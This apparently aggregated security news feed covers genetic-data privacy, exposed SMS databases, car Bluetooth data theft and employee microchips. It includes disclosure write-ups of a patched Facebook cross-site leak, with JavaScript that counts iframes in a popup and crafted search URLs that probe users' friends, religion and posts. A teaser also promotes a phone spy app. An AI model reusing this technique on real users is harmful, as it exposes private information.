The data becomes even more messy when you move beyond users of European descent. People of color, especially those of Asian or African descent, have had a particularly hard go of it because they are underrepresented in many companies’ data sets. Often, black, Hispanic, or Asian users receive reports that list parts of their heritage as “low confidence” because their DNA doesn’t sufficiently match the company’s points of reference.

DNA testing companies not only offer their customers information that is sometimes incomplete, inaccurate, and easy to misunderstand; they also provide the raw data output that can be downloaded and then sent to third-party websites for even more evaluation. But those sites have not historically been as well-protected as the major consumer DNA testing companies. Once again, the security and privacy of genetic data goes fluttering away into the ether when users upload it, unencrypted and unprotected, to third-party platforms.

Doing it right: privacy policy

As an emerging industry, there’s little in the way of regulation or public policy when it comes to consumer genetic testing. Laboratory testing is bound by Medicare and Medicaid clauses, and commercial companies are regulated by the FDA, but DNA testing companies are a little of both, with the added complexity of operating online. The General Data Protection Regulation (GDPR) launched in May 2018 requires companies to publicly disclose whether they’ve experienced a cyberattack, and imposes heavy fines for those who are not in compliance. But GDPR only applies to companies doing business in Europe.

As far as legal precedent is concerned, the 1990 California Supreme Court case Moore v. Regents of the University of California found that individuals no longer have claim over their genetic data once they relinquish it for medical testing or other forms of study. So if Ancestry sells your DNA to a pharmaceutical company that then uses your cells to find the cure for cancer, you won’t see a dime of compensation. Bummer.

Despite the many opportunities for data to be stolen, abused, misunderstood, and sold to the highest bidder, the law simply hasn’t caught up to our technology. So the teams developing security and privacy policies for DNA testing companies are doing pioneering work, embracing security best practices and transparency at every turn. This is the right thing to do.

Almost two years ago, founders at Helix started working with privacy experts in order to understand all the key pieces they would need to safeguard—and they recognized that there was a need to form a formal coalition to enhance collaboration across the industry.

Through the Future of Privacy Forum, an independent think tank focused on data privacy, they worked to create public policy that leaders in the industry could follow. They teamed up with representatives from 23andMe, Ancestry, and others to create a set of standards that primarily hammered home the importance of transparency and clear communication with consumers.

“It is something that we are very passionate about,” said Misha Rashkin, Senior Genetic Counselor at Helix and an active participant in developing the shared privacy policy. “We’ve spent our careers explaining genetics to people, so there’s a long-held belief that transparent, appropriate education—meaning developing policy at an approachable reading level—has got to be a cornerstone of people interacting with their DNA.”

While the privacy coalition strived for easy-to-understand language, the fact remains that their privacy policy is a 21-page document that most people are going to ignore. Rashkin and other team members were aware of this, so they built more touch points for customers to drill into the data and provide consent, including in-product notifications, emails, blog posts, and infographics delivered to customers as they continued to interact with their data on the platform.

Maps, diagrams, charts, and other visuals help users better understand their data.

After Rashkin and company finalized and published their privacy policy, they turned it into a checklist that partners could use to determine baseline security and privacy standards, and what companies need to do to be compliant. But the work won’t stop there.

“This is just the beginning,” said Elissa Levin, Senior Director of Clinical Affairs and Policy at Helix and a founding member of the privacy policy coalition. “As the industry evolves, we are planning on continuing to work on these standards and progress them. And then we’re actually going out to educate policy makers and regulators and the public in general. We want to help them determine what these policies are and differentiate who are the good players and who are the not-so-good players.”

Biggest area of concern: the unknown

We just don’t know what we don’t know when it comes to technology. When Mark Zuckerberg invented Facebook, he merely wanted an easy way to look at pretty college girls. I don’t think it entered his wildest dreams that his company’s platform could be used to directly interfere with a presidential election, or lead to the genocide of citizens in Myanmar. But because of a lack of foresight and an inability to move quickly to right the ship, we’re now all mired in the mud.

Right now, cybercriminals aren’t searching for DNA on the black market, but that doesn’t mean they won’t. Cybercrime often follows the path of least resistance—what takes the least amount of effort for the biggest payoff? That’s why social engineering attacks still vastly outnumber traditional malware infection vectors.

Because of that, cybercriminals likely believe it’s not worth jumping through hoops to try and break serious encryption for a product (genetic data) that’s not in demand—yet. But as biometrics and fingerprinting and other biological modes of authentication become more popular, I imagine it’s only a matter of time before the wagons start circling.

And yet—does it even matter? Even with all of the red flags exposed, millions of customers have taken the leap of faith because their curiosity overpowers their fear, or the immediate gratification is more satisfying than the nebulous, vague “what ifs” that we in the security community haven’t solved for. With so much data publicly available, do people even care about privacy anymore?

“There are changing sentiments about personal data among generations,” said Hunt. “There’s this entire generation who has grown up sharing their whole world online. This is their new social norm. We’re normalizing the collection of this information. I think if we were to say it’s a bad thing, we’d be projecting our more privacy-conscious viewpoints on them.”

Others believe that, regardless of personal feelings on privacy, this technology isn’t going away, so we—security experts, consumers, policy makers, and genetic testers alike—need to address its complex security and privacy issues head on.

“Privacy is such a personal matter. And while there may be trends, that doesn’t necessarily speak to an entire generation. There are people who are more open and there are people who are more concerned,” said Levin.  “Whether someone is concerned or not, we are going to set these standards and abide by these practices because we think it’s important to protect people, even if they don’t think it’s critical. Fundamentally, it does come down to being transparent and helping people be aware of the risk to at least mitigate surprises.”

Indeed, whether privacy is personally important to you or not, understanding which data is being collected from where and how companies benefit from using your data makes you a more well-informed consumer.

Don’t just check that box. Look deeper, ask questions, and do some self-reflection about what’s important to you. Because right now, if someone steals your data, you might have to change a few passwords or cancel a couple credit cards. You might even be embroiled in identity theft hell. But we have no idea what the consequences will be if someone steals your genetic code.

Laws change and society changes. What’s legal and sanctioned now may not be in the future. But that data is going to be around a long time. And you cannot change your DNA.

The post What DNA testing kit companies are really doing with your data appeared first on Malwarebytes Labs.

Cloud communication firm exposes millions of sensitive text messages to public access

By Waqas

There’s bad news for those who rely on SMS-based two-factor authentication. Berlin-based security researcher Sébastien Kaul has revealed that Voxox exposed a huge database containing tens of millions of text messages by storing it on an unprotected server. Voxox, a VoIP and cloud communications provider for SMS and voice services, has exposed sensitive […]

This is a post from HackRead.com Read the original post: Cloud communication firm exposes millions of sensitive text messages to public access

The PCLOB Needs a Director

The US Privacy and Civil Liberties Oversight Board is looking for a director. Among other things, this board has some oversight role over the NSA. More precisely, it can examine what any executive-branch agency is doing about counterterrorism. So it can examine the program of TSA watchlists, NSA anti-terrorism surveillance, and FBI counterterrorism activities.

The PCLOB was established in 2004 (when it didn't do much), disappeared from 2007 to 2012, and was reconstituted in 2012. It issued a major report on NSA surveillance in 2014. It has dwindled since then, having as few as one member. Last month, the Senate confirmed three new members, including Ed Felten.

So, potentially an important job if anyone out there is interested.

iKeyMonitor Spy App for iPhone and Android: Best Remote Monitoring Tool

By Carolina

Nowadays, it has become a social rule to own a smartphone, and humanity has become more dependent on social networks than ever before. We need to be connected to the Internet at all times and we publish our most private and personal thoughts there. Even at social events people spend their time constantly checking their […]

This is a post from HackRead.com Read the original post: iKeyMonitor Spy App for iPhone and Android: Best Remote Monitoring Tool

Privacy laws do not understand human error

In a world of increasingly punitive regulations like GDPR, the combination of unstructured data and human error represents one of the greatest risks an organization faces. Understanding the differences between unstructured and structured data – and the different approaches needed to secure it – is critical to achieve compliance with the many data privacy regulations that businesses in the U.S. now face. Structured data comprises individual elements of information organized to be accessible, … More

The post Privacy laws do not understand human error appeared first on Help Net Security.

Instagram’s download your data tool exposed users’ passwords to public view

By Waqas

Facebook somehow manages to make headlines one way or the other. Last week we were all praises for the social network for introducing the Unsend feature in the Messenger app, and this week we are despising the company’s lack of interest in offering fool-proof security to its users after a bug in Instagram’s download your data tool. […]

This is a post from HackRead.com Read the original post: Instagram’s download your data tool exposed users’ passwords to public view

CarsBlues Bluetooth attack Affects tens of millions of vehicles

The CarsBlues attack leverages security flaws in the infotainment systems installed in several types of vehicles via Bluetooth to access user PII.

A new Bluetooth hack, dubbed CarsBlues, potentially affects millions of vehicles, Privacy4Cars warns. The CarsBlues attack leverages security flaws in the infotainment systems installed in several types of vehicles via Bluetooth; it affects users who have synced their smartphones to their cars.

Privacy4Cars develops a mobile app for erasing PII from vehicles. According to the firm, tens of millions of vehicles could be affected worldwide, and that is a conservative estimate; the number could be much greater.

The riskiest scenario involves drivers who sync their phones to vehicles that have been rented, borrowed, or leased and returned. Their data might be exposed to attackers who can use it for various malicious purposes.

“The attack can be performed in a few minutes using inexpensive and readily available hardware and software and does not require significant technical knowledge.” reads the post published by the company.

“As a result of these findings, it is believed that users across the globe who have synced a phone to a modern vehicle may have had their privacy threatened. It is estimated that tens of millions of vehicles in circulation are affected worldwide, with that number continuing to rise into the millions as more vehicles are evaluated.”


The attack technique was discovered by Privacy4Cars founder Andrea Amico in February 2018; he immediately notified the Automotive Information Sharing and Analysis Center (Auto-ISAC).

Amico worked with Auto-ISAC to figure out how attackers could steal PII from vehicles manufactured by affected members. Attackers can access stored contacts, call logs, text logs, and in some cases text messages without the user’s mobile device being connected to the system.

The good news for drivers is that at least some manufacturers have already provided updates to make their latest models immune to the CarsBlues attack.

“Now that we have completed our ethical disclosure with the Auto-ISAC, we are turning our focus to educating the industry and the public about the risks associated with leaving personal information in vehicle systems,” explained Amico.

“The CarsBlues hack, given its ease to replicate, the breadth of situations in which it can be performed against unsuspecting targets, and the difficulty in detecting the exploitation, is a clear indication that industry and consumers alike need to be proactive when it comes to deleting personally identifiable information from vehicle infotainment systems.”

Privacy4Cars suggests vehicle users delete personal data from infotainment systems before allowing others access to their vehicles.

The firm also urges regulators to propose best practices for protecting consumer data and to require vendors to implement systems that help customers delete their personal information.

Pierluigi Paganini

(Security Affairs – CarsBlues, privacy)

The post CarsBlues Bluetooth attack Affects tens of millions of vehicles appeared first on Security Affairs.

How I Got Locked Out of the Chip Implanted In My Hand

Motherboard staff writer Daniel Oberhaus writes: If I had a single piece of advice for anyone thinking about getting an NFC chip implant it would be to do it sober.... [A]t the urging of everyone at the implant station, the first thing I did with my implant was secure it with a four-digit PIN. I hadn't decided what sort of data I wanted to put on the chip, but I sure as hell didn't want someone else to write to my chip first and potentially lock me out. I chose the same PIN that I used for my phone so I wouldn't forget it in the morning -- or at least, I thought I did.... I spent most of my first day as a cyborg desperately cycling through PIN possibilities, unable to unlock the NFC chip in my hand and add data to it. He remained locked out of his own implanted microchip for over a year. But even when he regained access, "a part of me wants to leave it blank. After a year of living with a totally useless NFC implant, I kind of started to like it. "That small, almost imperceptible little bump on my left hand was a constant reminder that even the most sophisticated and fool-proof technologies are no match for human incompetence."

Read more of this story at Slashdot.

More Companies Plan To Implant Microchips Into Their Employees’ Hands

"British companies are planning to microchip some of their staff in order to boost security and stop them accessing sensitive areas," reports the Telegraph. "Biohax, a Swedish company that provides human chip implants, told the Telegraph it was in talks with a number of UK legal and financial firms to implant staff with the devices." An anonymous reader quote Zero Hedge: It is really happening. At one time, the idea that large numbers of people would willingly allow themselves to have microchips implanted into their hands seemed a bit crazy, but now it has become a reality. Thousands of tech enthusiasts all across Europe have already had microchips implanted, and now a Swedish company is working with very large global employers.... For security-obsessed corporations, this sort of technology can appear to have a lot of upside. If all of your employees are chipped, you will always know where they are, and you will always know who has access to sensitive areas or sensitive information. According to a top official from Biohax, the procedure to implant a chip takes "about two seconds...." Of course once this technology starts to be implemented, there will be some workers that will object. But if it comes down to a choice between getting the implant or losing their jobs, how many workers do you think will choose to become unemployed? Engadget provides more examples, pointing out that in 2006 an Ohio surveillance firm had two employees in its secure data center implant RFIDs in their triceps, and that just last year 80 employees at Three Square Market in Wisconsin had chips implanted into their hands. Their article also hints that "no one's thinking about the inevitable DEF CON talk 'Chipped employees: Fun with attack vectors'" Dr. Stewart Southey, the Chief Medical Officer at Biohax International, describes the technology as "a secure way of ensuring that a person's digital identity is linked to their physical identity," with a syringe injecting the chip directly between their thumb and forefinger to enable near-field communication. But what do Slashdot's readers think? Would you let your employer microchip you?

Read more of this story at Slashdot.

A Leaky Database of SMS Text Messages Exposed Password Resets and Two-Factor Codes

A database which contained millions of text messages used to authenticate users signing into websites was left exposed to the internet without a password. From the report: The exposed server belongs to Voxox (formerly Telcentris), a San Diego, Calif.-based communications company. The server wasn't protected with a password, allowing anyone who knew where to look to peek in and snoop on a near-real-time stream of text messages. For Sebastien Kaul, a Berlin-based security researcher, it didn't take long to find. Although Kaul found the exposed server on Shodan, a search engine for publicly available devices and databases, it was also attached to one of Voxox's own subdomains. Worse, the database -- running on Amazon's Elasticsearch -- was configured with a Kibana front-end, making the data within easily readable, browsable and searchable for names, cell numbers and the contents of the text messages themselves.

Read more of this story at Slashdot.

Shoddy security of popular smartwatch lets hackers access your child’s location

By Waqas

Smartwatches are generally considered safe for keeping track of your kids when they are outside the home. However, there is a scary new revelation about this seemingly reliable gadget: it is possible to hack GPS-enabled smartwatches. Probably a majority of children wear smartwatches these days, and the fact that one of the most popular […]

This is a post from HackRead.com Read the original post: Shoddy security of popular smartwatch lets hackers access your child’s location

Fake Fingerprints Can Imitate Real Ones In Biometric Systems, Research Shows

schwit1 shares a report: Researchers have used a neural network to generate artificial fingerprints that work as a "master key" for biometric identification systems and prove fake fingerprints can be created. According to a paper [PDF] presented at a security conference in Los Angeles, the artificially generated fingerprints, dubbed "DeepMasterPrints" by the researchers from New York University, were able to imitate more than one in five fingerprints in a biometric system that should only have an error rate of one in a thousand. The researchers, led by NYU's Philip Bontrager, say that "the underlying method is likely to have broad applications in fingerprint security as well as fingerprint synthesis." As with much security research, demonstrating flaws in existing authentication systems is considered to be an important part of developing more secure replacements in the future. In order to work, the DeepMasterPrints take advantage of two properties of fingerprint-based authentication systems. The first is that, for ergonomic reasons, most fingerprint readers do not read the entire finger at once, instead imaging whichever part of the finger touches the scanner.

Read more of this story at Slashdot.

What’s keeping Europe’s top infosec pros awake at night?

As the world adapts to GDPR and puts more attention on personal privacy and security, Europe’s top information security professionals still have doubts about the industry’s ability to protect critical infrastructure, corporate networks, and personal information. Black Hat Europe’s new research report, entitled Europe’s Cybersecurity Challenges, details the thoughts that are keeping Europe’s top information security professionals awake at night. The report includes new insights directly from more than 130 survey respondents and spans topics … More

The post What’s keeping Europe’s top infosec pros awake at night? appeared first on Help Net Security.

Smashing Security #104: The world’s most evil phishing test, and cyborgs in the workplace


Does your employer want to turn you into a cyborg? Was this phishing test devised by an evil genius? And how did a cinema chain get scammed out of millions, time and time again…?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Scott Helme.

5 Privacy Mistakes that Leave You Vulnerable Online

By John Mason

When news broke about Cambridge Analytica, the Internet went into a frenzy: “How could Facebook do this!” “Facebook should be made accountable!” Besides the fact that I think the whole Cambridge Analytica issue was blown out of proportion, I believe the bigger issue is the fact that very few people are willing to be responsible for their […]

This is a post from HackRead.com Read the original post: 5 Privacy Mistakes that Leave You Vulnerable Online

Eraser – Windows Secure Erase Hard Drive Wiper


Eraser is a hard drive wiper for Windows which allows you to run a secure erase and completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns.

Eraser is a Windows-focused hard drive wiper and is currently supported under Windows XP (with Service Pack 3), Windows Server 2003 (with Service Pack 2), Windows Vista, Windows Server 2008, Windows 7, 8, 10, and Windows Server 2012.
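The idea behind this kind of wiping can be shown in a few lines (a toy sketch, not Eraser's actual code): overwrite the file's bytes with fixed patterns and then pseudorandom data before deleting it.

    const fs = require("fs");
    const crypto = require("crypto");

    // Toy multi-pass wipe: overwrite a file in place with fixed patterns,
    // then pseudorandom data, before unlinking it. Real tools like Eraser
    // use carefully chosen pattern sequences (e.g. Gutmann, DoD 5220.22-M).
    function wipeFile(path, passes = 3) {
      const size = fs.statSync(path).size;
      const patterns = [0x00, 0xff]; // zeroes, then ones

      for (let i = 0; i < passes; i++) {
        const buf = i < patterns.length
          ? Buffer.alloc(size, patterns[i]) // fixed-pattern pass
          : crypto.randomBytes(size);       // final pseudorandom pass
        const fd = fs.openSync(path, "r+");
        fs.writeSync(fd, buf, 0, size, 0);
        fs.fsyncSync(fd); // force the write out to the device
        fs.closeSync(fd);
      }
      fs.unlinkSync(path);
    }

Note that on SSDs and journaling file systems an in-place overwrite is not guaranteed to hit the original blocks, which is why dedicated tools also offer free-space and full-drive wiping.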

Read the rest of Eraser – Windows Secure Erase Hard Drive Wiper now! Only available at Darknet.

Facebook flaw could have exposed private info of users and their friends

Security experts from Imperva reported a new Facebook flaw that could have exposed private info of users and their friends

A new security vulnerability has been reported in Facebook, the flaw could have been exploited by attackers to obtain certain personal information about users and their network of contacts.

The recently discovered issue once again raises concerns about the privacy of the social network giant’s users.

The vulnerability was discovered by security experts from Imperva; it resides in the way Facebook’s search feature displays results for queries provided by users.

The good news for Facebook users is that this flaw has already been patched and did not allow attackers to conduct massive scraping of the social network for users’ information.

The page used to display the results of users’ queries includes iframe elements associated with each result. Experts discovered that the URLs associated with those iframes are vulnerable to cross-site request forgery (CSRF) attacks.

The exploitation of the flaw is quite simple: an attacker only needs to trick users into visiting a specially crafted website in a browser where they are already logged into their Facebook accounts.

The website includes JavaScript code that will be executed in the background when the victim clicks anywhere on the page.

“For this attack to work we need to trick a Facebook user to open our malicious site and click anywhere on the site, (this can be any site we can run JavaScript on) allowing us to open a popup or a new tab to the Facebook search page, forcing the user to execute any search query we want.” reads the analysis published by Imperva.

“Since the number of iframe elements on the page reflects the number of search results, we can simply count them by accessing the fb.frames.length property.

By manipulating Facebook’s graph search, it’s possible to craft search queries that reflect personal information about the user.”

Searching for something like “pages I like named `Imperva`”, the experts noticed they were forcing the social network to return one result if the user liked the Imperva page, or zero results if not.

By composing specific queries, it was possible to extract data about the user’s friends. Below are some interesting examples of queries provided by the experts; a sketch of the counting technique follows the list:

  • Check if the current Facebook users have friends from Israel: https://www.facebook.com/search/me/friends/108099562543414/home-residents/intersect
  • Check if the user has friends named “Ron”: https://www.facebook.com/search/str/ron/users-named/me/friends/intersect
  • Check if the user has taken photos in certain locations/countries: https://www.facebook.com/search/me/photos/108099562543414/photos-in/intersect
  • Check if the current user has Islamic friends: https://www.facebook.com/search/me/friends/109523995740640/users-religious-view/intersect
  • Check if the current user has Islamic friends who live in the UK: https://www.facebook.com/search/me/friends/109523995740640/users-religious-view/106078429431815/residents/present/intersect
  • Check if the current user wrote a post that contains a specific text: https://www.facebook.com/search/posts/?filters_rp_author=%7B%22name%22%3A%22author_me%22%2C%22args%22%3A%22%22%7D&q=cute%20puppies
  • Check if the current user’s friends wrote a post that contains a specific text: https://www.facebook.com/search/posts/?filters_rp_author=%7B%22name%22%3A%22author_friends%22%2C%22args%22%3A%22%22%7D&q=cute%20puppies
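Putting the pieces of that description together, the attacking page could look roughly like the following (a sketch based on the write-up above, not Imperva's published code; the search URL is one of the example queries from the list):

    // Sketch of the cross-origin iframe-counting technique described above.
    // Runs on the attacker's page; the click satisfies popup-blocker rules.
    document.addEventListener("click", () => {
      // A top-level navigation, so the query runs with the victim's
      // logged-in Facebook session.
      const fb = window.open(
        "https://www.facebook.com/search/str/ron/users-named/me/friends/intersect"
      );

      setTimeout(() => {
        // The page itself is cross-origin and unreadable, but frames.length
        // is one of the few properties browsers expose across origins, and
        // it leaks the number of iframes -- i.e., the number of search results.
        const results = fb.frames.length;
        console.log(results > 0 ? "Has a friend named Ron" : "No friend named Ron");
      }, 5000); // give the search page time to load
    });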

Imperva also published a video proof of concept demonstrating the attack.

The process can be repeated without the need for new popups or tabs to be opened, because the attacker can control the location property of the Facebook window from a script on the malicious page.

Experts pointed out that mobile users are particularly exposed to this kind of attack because it is easy for them to lose track of windows open in the background, allowing attackers to extract the results of multiple queries.

Imperva reported the flaw to Facebook through the company’s vulnerability disclosure program in May 2018, and the social network addressed the problem in a few days implementing CSRF protections.

Pierluigi Paganini

(Security Affairs – Facebook, hacking)

The post Facebook flaw could have exposed private info of users and their friends appeared first on Security Affairs.

Facebook Messenger to offer Unsend feature to delete sent messages

By Waqas

Facebook has made many efforts so far to refine its Messenger app. This year in May, Facebook CEO Mark Zuckerberg, along with other executives of the social network, admitted that Facebook Messenger has to be refined, since the current app contains many useless features while lacking critically important ones. For instance, its UI could […]

This is a post from HackRead.com Read the original post: Facebook Messenger to offer Unsend feature to delete sent messages

Patched Facebook Vulnerability Could Have Exposed Private Information About You and Your Friends

In a previous blog we highlighted a vulnerability in Chrome that allowed bad actors to steal Facebook users’ personal information; while digging around for bugs, we thought it prudent to see if there were any more loopholes that bad actors might be able to exploit.

What popped up was a bug that could have allowed other websites to extract private information about you and your contacts.

Having reported the vulnerability to Facebook under their responsible disclosure program in May 2018, we worked with the Facebook Security Team to mitigate regressions and ensure that the issue was thoroughly resolved.

Identifying the Threat

Throughout the research process for the Chrome piece, I browsed Facebook’s online search results, and in their HTML noticed that each result contained an iframe element — probably used for Facebook’s own internal tracking. Being pretty familiar with the unique cross-origin behavior of iframes, I came up with the following technique:

To start, let’s take a look at the Facebook search page: we have an endpoint that expects a GET request with a number of search parameters. The endpoint, like most search endpoints, is not cross-site request forgery (CSRF) protected, which normally allows users to share the search results page via a URL.

This is fine in most cases, since no action is being performed on behalf of the user, making a CSRF attack meaningless by itself. The thing is, iframes, unlike most web elements, are exposed in part to cross-origin documents; combine that with the search CSRF issue and you have a real problem on your hands.

A video proof of concept accompanied the original post.

Attack Flow

For this attack to work we need to trick a Facebook user to open our malicious site and click anywhere on the site, (this can be any site we can run JavaScript on) allowing us to open a popup or a new tab to the Facebook search page, forcing the user to execute any search query we want.

Since the number of iframe elements on the page reflects the number of search results, we can simply count them by accessing the fb.frames.length property.

By manipulating Facebook’s graph search, it’s possible to craft search queries that reflect personal information about the user.

For example, by searching “pages I like named `Imperva`” we force Facebook to return one result if the user liked the Imperva page, or zero results if not.

Similar queries can be composed to extract data about the user’s friends. For example, by searching “my friends who like Imperva” I can check if the current user has any friends who like the Imperva Facebook page.

Other interesting examples of the kind of data it was possible to extract:

  • Check if the current Facebook users have friends from Israel: https://www.facebook.com/search/me/friends/108099562543414/home-residents/intersect
  • Check if the user has friends named “Ron”: https://www.facebook.com/search/str/ron/users-named/me/friends/intersect
  • Check if the user has taken photos in certain locations/countries: https://www.facebook.com/search/me/photos/108099562543414/photos-in/intersect
  • Check if the current user has Islamic friends: https://www.facebook.com/search/me/friends/109523995740640/users-religious-view/intersect
  • Check if the current user has Islamic friends who live in the UK: https://www.facebook.com/search/me/friends/109523995740640/users-religious-view/106078429431815/residents/present/intersect
  • Check if the current user wrote a post that contains a specific text: https://www.facebook.com/search/posts/?filters_rp_author=%7B%22name%22%3A%22author_me%22%2C%22args%22%3A%22%22%7D&q=cute%20puppies
  • Check if the current user’s friends wrote a post that contains a specific text: https://www.facebook.com/search/posts/?filters_rp_author=%7B%22name%22%3A%22author_friends%22%2C%22args%22%3A%22%22%7D&q=cute%20puppies

This process can be repeated without the need for new popups or tabs to be open since the attacker can control the location property of the Facebook window by running the following code:
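The snippet referenced here appeared as an image in the original post and is not preserved in this archive; a reconstruction consistent with the description (an assumption, not Imperva's verbatim code) might look like this:

    // Assumed reconstruction: reuse one opened window for many forced searches
    // by re-pointing its location, which remains writable across origins.
    const fb = window.open(
      "https://www.facebook.com/search/str/ron/users-named/me/friends/intersect"
    );

    const queries = [
      "https://www.facebook.com/search/me/friends/108099562543414/home-residents/intersect",
      "https://www.facebook.com/search/me/photos/108099562543414/photos-in/intersect",
    ];

    let i = 0;
    const timer = setInterval(() => {
      console.log("query " + i + ": " + fb.frames.length + " result(s)"); // leaked count
      if (i >= queries.length) return clearInterval(timer);
      fb.location = queries[i]; // navigate the same window to the next query
      i++;
    }, 5000);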

This is especially dangerous for mobile users, since the open tab can easily get lost in the background, allowing the attacker to extract the results for multiple queries, while the user is watching a video or reading an article on the attacker’s site.

As a researcher, it was a privilege to have contributed to protecting the privacy of the Facebook user community, as we continuously do for our own Imperva community.

The post Patched Facebook Vulnerability Could Have Exposed Private Information About You and Your Friends appeared first on Blog.

Anonymous use of messengers in Russia is prohibited


After 180 days, all messengers will be required to identify their users by phone number through mobile operators. Prime Minister Dmitry Medvedev signed a government resolution approving the relevant rules last week. He believes this is necessary for the safety and convenience of users.

Messenger administrators will verify that the number is correct with the user’s mobile operator, which is given 20 minutes to process the request from the service.

Services will be available only to the person to whom the phone number is registered. In addition, mobile operators will record in their databases which applications their customers are using.

According to the Head of Roskomnadzor, Alexander Zharov, anonymous use of messengers hinders the investigation of crimes: "The possibility of anonymous communication in messengers complicates the activities of Law Enforcement Agencies in the investigation of crimes."

Experts, in turn, were skeptical about the initiative. Vladimir Zykov, Director of the Association of Professional Users of Social Networks and Messengers, believes that foreigners may face problems using SIM cards from their home countries. In addition, illegal sales of foreign operators' SIM cards may begin.

Citizens believe that formalizing the relationship between messengers and operators will only lead to negative consequences: higher tariff prices, the disappearance of anonymity in messengers, and a rise in hacker attacks.

In general, Russians do not believe these rules will work at all. As we remember, Roskomnadzor's attempt to shut down Telegram led to the blocking of thousands of IP addresses and serious financial losses for innocent companies. And the messenger continued to work.
 

What Parents Need to Know About Live-Stream Gaming Sites Like Twitch

Clash of Clans, Runescape, Fortnite, Counter-Strike, Battlefield V, and Dota 2. While these titles may not mean much to those outside of the video gaming world, they are just a few of the wildly popular games thousands of players are live streaming to viewers worldwide this very minute. However, with all the endless hours of entertainment this cultural phenomenon offers tweens, teens, and even adults, it also comes with some risks attached.

The What

Each month, more than 100,000 people log on to sites like Twitch and YouTube to watch gamers play. Streamers, also called twitchers, broadcast their gameplay live online while others watch and participate through a chat feature. Each gamer attracts an audience (a few dozen to hundreds of thousands of viewers daily) based on their skill level and the kind of commentary and interaction with viewers they offer.

Reports state that video game streaming can attract more viewers than some of cable’s most popular television shows.

The Why

Ask any streamer (or viewer) why they do it, and many will tell you it’s to showcase and improve their skills and to be part of a community of people who are equally passionate about gaming.

Live streaming is also free and global, so gamers from any country can connect in any language. You’ll find streamers playing games in Turkish, Russian, Spanish, and the list goes on. Many streamers have gone from amateurs to gaming celebrities through elaborate production and marketing of their Twitch or YouTube feeds.

Some streamers hold marathon streaming sessions and multi-player competitions designed to benefit charities. Twitch is also appealing because it allows users to watch popular gaming conventions such as TwitchCon, E3, and Comic-Con. There are also live gaming talk shows and podcasts, and a channel where users can watch people do everyday things like cook, create pieces of art, or play music.

The Risks

Although Twitch’s community guidelines prohibit violent behavior, sexual content, bullying, and harassment, a browse through some of the live games suggests that many users don’t take the guidelines seriously.

Here are just a few things to keep in mind if your kids frequent live streaming communities like Twitch.

  1. Bullying. Bullying happens on every social network in some form, and Twitch is no different. In one study, over 13% of respondents said they felt personally attacked on Twitch, and more than 27% had witnessed racial or gender-based bullying in live streaming.
  2. Crude language. While there are streamers who put a big emphasis on keeping things clean, most Twitch streamers do not. Some streamers will put up a “mature content” warning before you click on their site. Both streamers and viewers can get harsh with language, conversations, and points of view.
  3. Violent games. Many of the games on Twitch are violent and intended for mature viewers. However, you can also find milder games such as Minecraft and Mario Brothers if your kids are younger. The best way to assess a game’s violence is to sit and watch it with your child.
  4. Health risks. Sitting and playing video games for extended periods of time can affect players’ and viewers’ physical and emotional well-being. In the most extreme cases, gamers have died due to excessive gaming.
  5. Costs. Twitch is free to sign up for and watch, but if you want the extras (no ads), it’s $8.99 a month. Viewers can also subscribe to individual gamers’ feeds and purchase “bits” to cheer on their favorite players (kind of like badges), which can add up quickly.
  6. Stalking. Viewers have been known to stalk, harass, rob, and try to meet celebrity streamers. Recently, Twitch announced both private and public chat rooms to try to boost privacy among users.
  7. Swatting. An increasingly common practice called “swatting” involves reporting a fake emergency at a victim’s home in order to send a SWAT team barging in on them. Some swatting cases connected to Twitch have ended tragically.
  8. Wasted time. Marathon gaming sessions, skipping school to play or view games, and gaming through the night are common in Twitch communities. Twitch, like any other social network, needs parental attention and ground rules.
  9. Privacy. Spending a lot of time with people in an online “community” can create a false sense of trust. Often kids will answer an innocent question in a live chat, such as where they live or what school they attend. Leaking little bits of information over time allows a malicious person to piece together a detailed picture of your child.

An endnote: If your kids love Twitch or live-stream gaming on YouTube or other sites, spend some time on those sites. Listen to the conversations your kids are having with others online. What’s the tone? Is there too much sarcasm or cruel “joking” going on? Put limits on screen time, and remember that balance and monitoring are key to guiding healthy online habits.

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures)

 

The post What Parents Need to Know About Live-Stream Gaming Sites Like Twitch appeared first on McAfee Blogs.

Privacy and Security of Data at Universities

Interesting paper: "Open Data, Grey Data, and Stewardship: Universities at the Privacy Frontier," by Christine Borgman:

Abstract: As universities recognize the inherent value in the data they collect and hold, they encounter unforeseen challenges in stewarding those data in ways that balance accountability, transparency, and protection of privacy, academic freedom, and intellectual property. Two parallel developments in academic data collection are converging: (1) open access requirements, whereby researchers must provide access to their data as a condition of obtaining grant funding or publishing results in journals; and (2) the vast accumulation of "grey data" about individuals in their daily activities of research, teaching, learning, services, and administration. The boundaries between research and grey data are blurring, making it more difficult to assess the risks and responsibilities associated with any data collection. Many sets of data, both research and grey, fall outside privacy regulations such as HIPAA, FERPA, and PII. Universities are exploiting these data for research, learning analytics, faculty evaluation, strategic decisions, and other sensitive matters. Commercial entities are besieging universities with requests for access to data or for partnerships to mine them. The privacy frontier facing research universities spans open access practices, uses and misuses of data, public records requests, cyber risk, and curating data for privacy protection. This Article explores the competing values inherent in data stewardship and makes recommendations for practice by drawing on the pioneering work of the University of California in privacy and information security, data governance, and cyber risk.

Don’t Mix the Two Up: What Is the Difference Between Privacy & Security?

Knowing that a tomato is a fruit is knowledge – not adding it to a fruit salad is wisdom. Similarly, having knowledge about privacy and security is good, but true wisdom is knowing that they are vastly different from each other. While both, to some extent, revolve around the protection of your personal, public and […]… Read More

The post Don’t Mix the Two Up: What Is the Difference Between Privacy & Security? appeared first on The State of Security.

IoT Lockdown: Ways to Secure Your Family’s Digital Home and Lifestyle

If you took an inventory of your digital possessions, chances are most of your life — everything from phones to toys, to wearables, to appliances — has wholly transitioned from analog to digital (rotary to wireless). What you may not realize is that this dramatic transition comes with a fair amount of risk.

Privacy for Progress

With this massive tech migration, an invisible exchange has taken place: privacy for progress. Here we are, intentionally and happily immersed in the Internet of Things (IoT). IoT refers to everyday objects with computing devices embedded in them that can send and receive data over the internet.

That’s right. Your favorite fitness tracking app may be collecting and giving away personal data. That smart toy, baby device, or video game may be monitoring your child’s behavior and gathering information to influence future purchases. And, that smart coffee maker may be transmitting more than just good morning vibes.

